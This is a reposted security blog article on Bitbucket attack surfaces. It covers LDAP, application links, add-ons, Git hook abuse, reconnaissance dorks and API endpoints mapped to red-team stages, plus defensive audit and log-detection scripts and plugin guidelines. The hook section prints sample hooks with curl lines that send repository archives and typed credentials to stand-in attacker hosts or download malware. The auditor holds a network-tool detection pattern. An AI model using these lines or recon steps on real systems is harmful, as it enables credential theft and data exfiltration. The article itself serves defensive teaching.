Bitbucket Attack Vector

Category: Penetration techniques | 10 months ago | admin

Introduction

Bitbucket, a widely used Git repository management solution, provides a platform for developers to manage and collaborate on code. However, its extensive functionality and integration capabilities also present numerous attack vectors and surfaces that adversaries might exploit. This APT report outlines potential attack vectors and surfaces within Bitbucket, focusing on the data pipeline, Active Directory (LDAP), application links, and add-ons.

Attack Vectors

1. Data Pipeline:

Attack Vector:

Data Interception: Adversaries may target the data pipeline to intercept, manipulate, or exfiltrate sensitive data.

Injection Attacks: Injecting malicious code or altering data while it is in transit.

Attack Surface:

API Endpoints: Unauthorized access to API endpoints can lead to data leaks or unauthorized actions.

Data Transmission: Unsecured data transmission between integrated systems.

Mitigation:

Implement robust encryption for data in transit.

Enforce API security through authentication and authorization mechanisms.

2. Active Directory – LDAP:

Attack Vector:

Credential Harvesting: Targeting LDAP to harvest user credentials and gain unauthorized access.

Privilege Escalation: Exploiting misconfigurations to escalate privileges.

Attack Surface:

LDAP Integration: Direct interaction with LDAP might expose it to unauthorized access or exploitation.

User Data: Sensitive user data stored or managed through LDAP.

Mitigation:

Employ stringent access controls and monitoring for LDAP.

Regularly audit and update LDAP configurations.

3. Application Link:

Attack Vector:

Link Exploitation: Exploiting application links to gain unauthorized access or disrupt services.

Data Manipulation: Altering data being shared or transferred between linked applications.

Attack Surface:

Inter-Application Communication: The communication channel between linked applications.

Authentication Tokens: Tokens used for authenticating linked applications.

Mitigation:

Ensure secure, encrypted communication between linked applications.

Implement token security and rotate authentication tokens regularly.

4. Add-Ons (JAR):

Attack Vector:

Malicious Add-On: Introducing a malicious add-on to compromise Bitbucket.

Add-On Vulnerabilities: Exploiting vulnerabilities within legitimate add-ons.

Attack Surface:

Add-On Marketplace: The platform through which add-ons are distributed and installed.

Add-On Permissions: The permissions and access granted to installed add-ons.

Mitigation:

Validate and verify add-ons before installation.

Limit add-on permissions to the least privilege necessary.

Threat Actor Tactics, Techniques, and Procedures (TTPs):

Initial Access: Using stolen credentials or exploiting vulnerabilities to gain initial access.

Execution: Deploying malicious add-ons or scripts for execution within the environment.

Persistence: Exploiting application links or add-ons to maintain persistent access.

Privilege Escalation: Exploiting misconfigurations or vulnerabilities within LDAP or add-ons.

Defense Evasion: Manipulating logs or employing obfuscation techniques.

Credential Access: Targeting LDAP or API tokens for credential access.

Discovery: Identifying valuable data or further exploit vectors within the data pipeline.

Lateral Movement: Using application links or exploiting add-ons to move laterally.

Impact: Manipulating, deleting, or exfiltrating data to impact the organization.

Git Hook Vulnerabilities

Git hooks, a fundamental feature in Bitbucket, offer developers the flexibility to streamline workflows through automation. However, these hooks can also be abused by threat actors, presenting security risks on both the server side and the client side of Bitbucket.

Server-Side Git Hook Abuses:

1. Malicious Code Execution: Server-side Git hooks, such as pre-receive and post-receive hooks, can be abused by attackers to execute unauthorized code on the Bitbucket server. The following is a non-functional example of a malicious pre-receive hook:

#!/bin/bash
# A non-functional malicious pre-receive hook
while read oldrev newrev refname; do
  # Insert malicious code here
done

In reality, such a script could run malicious code that compromises the server's integrity or exfiltrates sensitive data.

2. Data Exfiltration: Malicious actors can manipulate server-side hooks to steal sensitive information from Bitbucket repositories. For instance, a modified post-receive hook might transmit confidential data to an external server:

#!/bin/bash
# A non-functional example of a malicious post-receive hook for data exfiltration
while read oldrev newrev refname; do
  git archive --format=zip --output=/tmp/data.zip $newrev
  curl -X POST -F "file=@/tmp/data.zip" https://attacker-server.com/upload
done

This example demonstrates how attackers could exfiltrate data from a repository.

3. Data Tampering: Threat actors might manipulate server-side hooks to tamper with data within a repository. They can modify post-receive hooks to alter code or data after it has been pushed. Although this example is non-functional, it demonstrates how data tampering might occur:

#!/bin/bash
# A non-functional malicious post-receive hook for data tampering
while read oldrev newrev refname; do
  if [ "$refname" == "refs/heads/master" ]; then
    # Insert code to modify repository data here
  fi
done

In a real-world scenario, this script could introduce vulnerabilities or compromise the integrity of a repository.

Client-Side Git Hook Abuses:

1. Credential Theft: Client-side Git hooks can be exploited to steal user credentials. Below is an example of a malicious pre-push hook:

#!/bin/bash
# A non-functional example of a malicious client-side pre-push hook for credential theft
read -p "Enter your username: " username
read -sp "Enter your password: " password
# Send the captured credentials to a remote server (non-functional)
curl -X POST -d "username=$username&password=$password" https://malicious-server.com/steal.php

While this script may not work, it illustrates how an attacker might attempt to steal user credentials.

2. Code Injection: Threat actors can manipulate client-side hooks to inject malicious code into a repository without a developer's knowledge. Here is a simplified example of a malicious post-checkout hook:

#!/bin/bash
# A non-functional example of a malicious client-side post-checkout hook for code injection
echo "Malicious code injection" >> compromised-file.js

This hypothetical script could insert unauthorized code into a developer's workspace.

3. Propagation of Malware: Client-side hooks can also be abused to propagate malware within a development team. A malicious pre-clone hook, though non-functional, showcases how an attacker might attempt to distribute malware:

#!/bin/bash
# A non-functional example of a malicious client-side pre-clone hook for malware propagation
echo "Downloading a useful tool..."
curl -o ~/Downloads/useful-tool.exe https://malicious-server.com/malware.exe

This script, if operational, could attempt to download and execute malware on a developer's machine during a repository clone operation.

4. Code Tampering: Attackers can manipulate client-side Git hooks to tamper with code and introduce vulnerabilities. For example, a malicious pre-commit hook could modify code in a way that introduces a security flaw, as demonstrated below:

#!/bin/bash
# A non-functional example of a malicious client-side pre-commit hook for code tampering
sed -i 's/validate_password($password)/validate_password($password, false)/' login.php

In a real-world scenario, this modification could compromise the security of an application.

In summary, Git hooks in Bitbucket provide valuable automation capabilities but can also become vectors for abuse if they are not managed and secured properly. Two properties matter for defenders: server-side hooks run on the server with the privileges of the Bitbucket service account, and client-side hooks live in the local .git/hooks directory (or the directory named by core.hooksPath) and are never transferred by clone, fetch, or push, so they have to be placed on each developer's machine by some other means. Both locations should therefore be inventoried and integrity-checked.
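The following is an added example, not code from the original post or from Bitbucket, that implements the defender-side check the hook section calls for: it audits a Git hooks directory, flags executable hooks containing network-capable commands (the ingredient every exfiltration hook above depends on), and reports hooks whose SHA-256 is missing from an approved manifest. The directory layout is an assumption: a bare server repository keeps its hooks in <repo>/hooks, a developer checkout in <checkout>/.git/hooks or wherever core.hooksPath points. The sample hooks it audits are constructed inline; example.invalid is a reserved name, not a real host.

```python
"""Audit Git hook directories for unapproved or network-capable hooks (added example)."""
import hashlib
import os
import re
import shutil
import stat
import tempfile

# Commands a lint/format hook rarely needs but every exfiltration hook does.
NETWORK_RE = re.compile(r"\b(curl|wget|ncat|socat|nc)\b|/dev/tcp/")


def sha256_of(path):
    """Hex SHA-256 of a file, used to compare a hook against the approved manifest."""
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def audit_hooks(hooks_dir, approved=None):
    """Return (severity, hook_name, message) findings for one hooks directory.

    approved: optional {hook_name: sha256} manifest; executable hooks absent
    from it, or whose hash differs, are flagged. Git ignores *.sample files,
    sub-directories and non-executable files, and so does the audit (the
    last of these is reported as INFO because a dropped file may be staged).
    """
    findings = []
    for name in sorted(os.listdir(hooks_dir)):
        path = os.path.join(hooks_dir, name)
        if not os.path.isfile(path) or name.endswith(".sample"):
            continue
        if not (os.stat(path).st_mode & stat.S_IXUSR):
            findings.append(("INFO", name, "present but not executable; Git will not run it"))
            continue
        with open(path, "r", errors="replace") as fh:
            body = fh.read()
        if NETWORK_RE.search(body):
            findings.append(("WARN", name, "executable hook contains a network-capable command"))
        if approved is not None:
            digest = sha256_of(path)
            if approved.get(name) != digest:
                findings.append(("WARN", name, "not in approved manifest (sha256 %s...)" % digest[:12]))
    return findings


def build_sample_hooks_dir():
    """Create a constructed hooks directory (sample data, not real hooks) and return its path."""
    d = tempfile.mkdtemp(prefix="hooks-audit-")
    samples = {
        # a benign hook that only runs a local checker (hypothetical script name)
        "pre-receive": ("#!/bin/sh\nexec ./check-refs.sh\n", True),
        # modelled on the post's data-exfiltration hook
        "post-receive": ("#!/bin/sh\ncurl -F file=@/tmp/data.zip https://example.invalid/up\n", True),
        # a dropped file that was never made executable
        "update": ("#!/bin/sh\nwget http://example.invalid/x\n", False),
        # Git ignores *.sample files
        "pre-push.sample": ("echo sample\n", True),
    }
    for name, (body, executable) in samples.items():
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write(body)
        os.chmod(p, 0o755 if executable else 0o644)
    return d


def demo():
    """Audit the constructed directory with only pre-receive approved; returns the findings."""
    d = build_sample_hooks_dir()
    try:
        approved = {"pre-receive": sha256_of(os.path.join(d, "pre-receive"))}
        findings = audit_hooks(d, approved)
    finally:
        shutil.rmtree(d, ignore_errors=True)
    for sev, name, msg in findings:
        print(sev, name + ":", msg)
    return findings


if __name__ == "__main__":
    demo()
```

Run it across every repository's hooks directory on the server and against developer checkouts; a hook that is both network-capable and absent from the manifest is the pattern the exfiltration examples above produce.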

Tools

Identifying Bitbucket Instances with a Cyber Threat Intelligence Service

Google Dorks:

Find Bitbucket Instances:

Dork: intitle:"Bitbucket" login

Find Public Repositories:

Dork: intitle:"Bitbucket" "Overview" inurl:projects

Exposed .git Directories:

Dork: intitle:"index of" inurl:.git

Paths:

User Enumeration:

Path: /rest/api/1.0/users

Repository Discovery:

Path: /rest/api/1.0/projects/{projectKey}/repos

SSH Keys:

Path: /rest/ssh/1.0/keys

Webhooks:

Path: /rest/webhooks/1.0/webhook

Ports:

Default HTTP:

Port: 7990

Default HTTPS:

Port: 7999

SSH:

Port: 7992

Meta Tags:

Application Name:

Meta Tag: <meta name="application-name" content="Bitbucket">

Important API Endpoints Across Red Teaming Stages

1. Reconnaissance Stage:

User Enumeration:

Endpoint: /rest/api/1.0/users

Red Team Use: Identifying users for targeted phishing or brute-force attacks.

Repository Discovery:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos

Red Team Use: Identifying repositories to target for codebase analysis or data exfiltration.

2. Initial Access Stage:

Authentication:

Endpoint: /rest/auth/1/session

Red Team Use: Attempting unauthorized access via credential stuffing or brute force.

API Token Access:

Endpoint: /rest/access-tokens/1.0/tokens/current

Red Team Use: Attempting to steal or misuse API tokens.

3. Establishing Foothold Stage:

Create Pull Request:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/pull-requests

Red Team Use: Introducing malicious code through pull requests.

Clone Repository:

Endpoint: /scm/{projectKey}/{repositorySlug}.git

Red Team Use: Downloading codebases to identify vulnerabilities or sensitive data.

4. Privilege Escalation Stage:

User Permissions:

Endpoint: /rest/api/1.0/admin/permissions/users?filter={username}

Red Team Use: Identifying users with high privileges to target.

Group Permissions:

Endpoint: /rest/api/1.0/admin/permissions/groups

Red Team Use: Identifying groups with high privileges for infiltration.

5. Lateral Movement Stage:

SSH Keys:

Endpoint: /rest/ssh/1.0/keys

Red Team Use: Stealing SSH keys to access other systems.

Application Links:

Endpoint: /rest/applinks/1.0/applicationlink

Red Team Use: Moving laterally to linked applications.

6. Impact Stage:

Delete Repository:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}

Red Team Use: Deleting or altering repositories to disrupt operations.

Modify User:

Endpoint: /rest/api/1.0/users/{userSlug}

Red Team Use: Modifying user details for further attacks or obfuscation.

Additional Endpoints:

7. Data Exfiltration Stage:

Fetch Commits:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/commits

Red Team Use: Identifying and exfiltrating sensitive data or changes.

8. Persistence Stage:

Webhooks:

Endpoint: /rest/webhooks/1.0/webhook

Red Team Use: Creating malicious webhooks for continuous data access.

9. Obfuscation Stage:

Audit Logs:

Endpoint: /rest/audit/1.0/audits

Red Team Use: Identifying and erasing traces of malicious activities.

10. Cleanup Stage:

Remove SSH Key:

Endpoint: /rest/ssh/1.0/keys/{keyId}

Red Team Use: Removing SSH keys to erase traces and maintain access.
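The endpoint list above doubles as a detection map: each stage leaves a distinctive request in the access log. The following is an added example, not code from the original post or from Bitbucket, that runs simple detection rules over access-log lines and labels hits with the stage they correspond to. The log format is a constructed, simplified one (client IP, user, quoted method and path, status); adapt parse_line to your instance's real access-log layout. The thresholds and the sample log are assumptions chosen for the demo, and 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.

```python
"""Map Bitbucket access-log requests to the red-team stages above (added example)."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3})$'
)

# Single successful requests worth an alert on their own: (rule, method, path regex, stage).
SINGLE_HIT_RULES = [
    ("webhook-created", "POST", r"^/rest/webhooks/1\.0/webhook/?$", "persistence"),
    ("ssh-key-added", "POST", r"^/rest/ssh/1\.0/keys/?$", "lateral-movement"),
    ("ssh-key-removed", "DELETE", r"^/rest/ssh/1\.0/keys/\d+$", "cleanup"),
    ("audit-log-read", "GET", r"^/rest/audit/1\.0/audits", "obfuscation"),
    ("repo-deleted", "DELETE", r"^/rest/api/1\.0/projects/[^/]+/repos/[^/]+$", "impact"),
    ("permissions-enumerated", "GET", r"^/rest/api/1\.0/admin/permissions/", "privilege-escalation"),
]

USER_ENUM_THRESHOLD = 5     # paged GETs of /rest/api/1.0/users from one client (assumed)
FAILED_LOGIN_THRESHOLD = 4  # 401 responses on /rest/auth/1/session from one client (assumed)


def parse_line(line):
    """Return (ip, user, method, path, query, status), or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    return m.group("ip"), m.group("user"), m.group("method"), path, query, m.group("status")


def detect(lines):
    """Return alerts as (stage, rule, ip, user) tuples, in the order they fire."""
    alerts = []
    user_enum = defaultdict(int)
    failed_logins = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, user, method, path, _query, status = parsed
        for rule, rule_method, path_re, stage in SINGLE_HIT_RULES:
            if method == rule_method and status.startswith("2") and re.search(path_re, path):
                alerts.append((stage, rule, ip, user))
        # Reconnaissance: one client paging through the whole user directory.
        if method == "GET" and path == "/rest/api/1.0/users":
            user_enum[ip] += 1
            if user_enum[ip] == USER_ENUM_THRESHOLD:
                alerts.append(("reconnaissance", "user-enumeration", ip, user))
        # Initial access: repeated authentication failures from one client.
        if path == "/rest/auth/1/session" and status == "401":
            failed_logins[ip] += 1
            if failed_logins[ip] == FAILED_LOGIN_THRESHOLD:
                alerts.append(("initial-access", "password-guessing", ip, user))
    return alerts


# Constructed sample log, not captured from a real instance.
SAMPLE_LOG = """\
203.0.113.7 - "GET /rest/api/1.0/users?start=0&limit=100" 200
203.0.113.7 - "GET /rest/api/1.0/users?start=100&limit=100" 200
203.0.113.7 - "GET /rest/api/1.0/users?start=200&limit=100" 200
203.0.113.7 - "GET /rest/api/1.0/users?start=300&limit=100" 200
203.0.113.7 - "GET /rest/api/1.0/users?start=400&limit=100" 200
203.0.113.7 - "POST /rest/auth/1/session" 401
203.0.113.7 - "POST /rest/auth/1/session" 401
203.0.113.7 - "POST /rest/auth/1/session" 401
203.0.113.7 - "POST /rest/auth/1/session" 401
203.0.113.7 jdoe "POST /rest/webhooks/1.0/webhook" 201
203.0.113.7 jdoe "POST /rest/ssh/1.0/keys" 201
203.0.113.7 jdoe "GET /rest/audit/1.0/audits?limit=50" 200
203.0.113.7 jdoe "DELETE /rest/ssh/1.0/keys/42" 204
198.51.100.9 alice "GET /rest/api/1.0/projects/PROJ/repos" 200
"""


def demo():
    """Run the rules over the constructed log and return the alerts."""
    alerts = detect(SAMPLE_LOG.splitlines())
    for stage, rule, ip, user in alerts:
        print(f"[{stage}] {rule} from {ip} (user {user})")
    return alerts


if __name__ == "__main__":
    demo()
```

The single-hit rules fire only on 2xx responses, so denied attempts are left to the threshold rules; reading the audit log is a legitimate admin activity and should be treated as a low-severity signal to correlate with the others rather than an alert on its own.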

Bitbucket Plugin Security and Development Guidelines

Bitbucket, a widely used Git repository management solution, allows developers to extend its functionality through plugins. However, plugin development and use must be approached with a security-first mindset to prevent vulnerabilities and ensure the stability of the Bitbucket environment. Note that the Java and Jelly snippets in this section (FormValidation, @Extension, Descriptor<Builder>, AbstractBuild, config.jelly) use Jenkins plugin API idioms rather than the Bitbucket Server plugin SDK; read them as illustrations of each guideline, not as Bitbucket-specific code.

Bitbucket Plugin Security:

Dependency Scanning:

Ensure all dependencies of your plugin are free from known vulnerabilities.

Use tools like OWASP Dependency-Check to identify and fix issues.

Code Review:

Conduct regular code reviews to identify potential security issues.

Ensure that no secrets or sensitive data are hardcoded in the plugin code.

Access Control:

Implement strict access controls and ensure that only authorized users can configure or use the plugin.

Use Bitbucket's built-in functions to enforce permissions.

public void doSomeAction(HttpServletRequest req, HttpServletResponse rsp) {
    // Check the permission before doing anything else so the action fails closed.
    // PermissionCheck is illustrative; the Bitbucket Server API provides
    // PermissionValidationService for this purpose.
    PermissionCheck.checkAdmin();
    // Action code here
}

Input Validation:

Validate and sanitize all inputs to prevent injection attacks.

Use allow-lists and regular expressions to validate data.

public FormValidation doCheckName(@QueryParameter String value) {
    // Allow-list: only letters, digits and underscore; everything else is rejected
    if (value.matches("^[a-zA-Z0-9_]+$")) {
        return FormValidation.ok();
    } else {
        return FormValidation.error("Invalid name");
    }
}

Output Encoding:

Ensure all outputs are properly encoded to prevent XSS attacks.

Use functions like HtmlUtils.htmlEscape to encode data.

String safeOutput = HtmlUtils.htmlEscape(inputString);

Bitbucket Plugin Development Guidelines:

Follow the MVC Architecture:

Separate the Model, View, and Controller to ensure clean and maintainable code.

Use the Bitbucket API:

Leverage the Bitbucket API for accessing built-in functionality and objects.

Implement Descriptors:

Descriptors help in defining global configurations and settings.

@Extension
public static final class DescriptorImpl extends Descriptor<Builder> {
    public boolean isApplicable(Class<? extends AbstractProject> aClass) {
        return true;
    }

    public String getDisplayName() {
        return "My Plugin Name";
    }
}

Define Configurations:

Use config.jelly to define the configuration options in the UI.

<j:jelly xmlns:j="jelly:core" xmlns:f="/lib/form">
    <f:entry title="Parameter" field="parameter">
        <f:textbox />
    </f:entry>
</j:jelly>

Handle Build Steps:

Implement classes to define actions to be taken during a build step.

public class MyBuilder extends Builder {
    private final String parameter;

    @DataBoundConstructor
    public MyBuilder(String parameter) {
        this.parameter = parameter;
    }

    @Override
    public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) {
        // Build step actions here
        return true;
    }
}

Manage Plugin Dependencies:

Ensure your pom.xml correctly defines all dependencies and the Bitbucket version.

<dependencies>
    <dependency>
        <groupId>com.atlassian.bitbucket.server</groupId>
        <artifactId>bitbucket-api</artifactId>
        <version>7.0.0</version>
        <scope>provided</scope>
    </dependency>
</dependencies>

Conclusion:

Bitbucket, while providing a robust platform for code management and collaboration, also presents various attack vectors and surfaces that need to be secured and monitored. Organizations must employ a defense-in-depth strategy, ensuring that each attack surface is secured and potential vectors are mitigated. Regular audits, monitoring, and security best practices are pivotal in safeguarding the environment against sophisticated APTs.

Originally published by hadess: Bitbucket Attack Vector

Posted by admin on 18 January 2024 at 9:26 AM. When reprinting, please credit: Bitbucket Attack Vector | CTF导航